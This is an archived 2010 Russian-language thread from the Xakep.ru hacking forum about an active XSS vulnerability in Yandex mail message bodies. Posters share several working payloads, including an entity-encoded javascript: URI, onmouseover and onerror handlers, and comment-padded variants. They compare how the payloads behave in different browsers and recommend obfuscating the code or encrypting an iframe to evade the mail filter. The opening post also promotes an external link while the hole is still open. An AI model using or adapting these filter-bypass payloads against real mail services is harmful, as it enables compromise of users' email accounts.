Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 
журналы новости статьи video форум подписка на «Хакер»

Уязвимость xss yandex

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [Уязвимости] >> Уязвимость xss yandex
Имя
Сообщение << Старые топики   Новые топики >>
Уязвимость xss yandex - 2010-04-21 02:34:19.063333   
yse890

Сообщений: 40
Оценки: 0
Присоединился: 2010-01-31 03:55:06.410000
 Активная yandex хss в теле письма качаем видео ролик пока не закрыли дырку
http://rocinduktor.ru
Post #: 1
RE: Уязвимость xss yandex - 2010-04-21 08:02:26.606666   
Alex.Black

Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
 Уже прикрыли
Вот код:
&lt;img src=&#0000106&#000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041&gt;
Post #: 2
RE: Уязвимость xss yandex - 2010-04-21 10:24:21.466666   
yse890

Сообщений: 40
Оценки: 0
Присоединился: 2010-01-31 03:55:06.410000
 под оперой работает под мазилой нужно шифровать ифраме 
Post #: 3
RE: Уязвимость xss yandex - 2010-04-21 12:22:40.396666   
Alex.Black

Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
 Я в опере делал, у меня что-то не сработало, попробую еще раз.
Post #: 4
RE: Уязвимость xss yandex - 2010-04-21 14:56:41.656666   
yse890

Сообщений: 40
Оценки: 0
Присоединился: 2010-01-31 03:55:06.410000
 это уязвимость работает в разных браузерах по разному
,одно заметил что после при получении письма

 не возвращает хсс ,просмотрел исходный код не фильтрует ,тут появилась новая задачка
почему так,а если взять function rot13
ниже перечисленные скрипты могут  сработать там но в разных браузерах
<SELECT NAME="" onmouseover=alert(123)>


<img wa="wa" src="http://img.imgsmail.ru/0.gif" width="0" height="0"/>

&gt">/**/<img /**/src=foo.png/**/ onerror=alert(/xssed/)/**/ /**>
 <img src="&#000000000106avascript:confirm(/lo/)">  

<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

 нужно шифровать  ,а лучше написать побыстрому свой Обфускатор  кода  вам видней
Post #: 5
Страниц:  [1]
Все форумы >> [Уязвимости] >> Уязвимость xss yandex







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.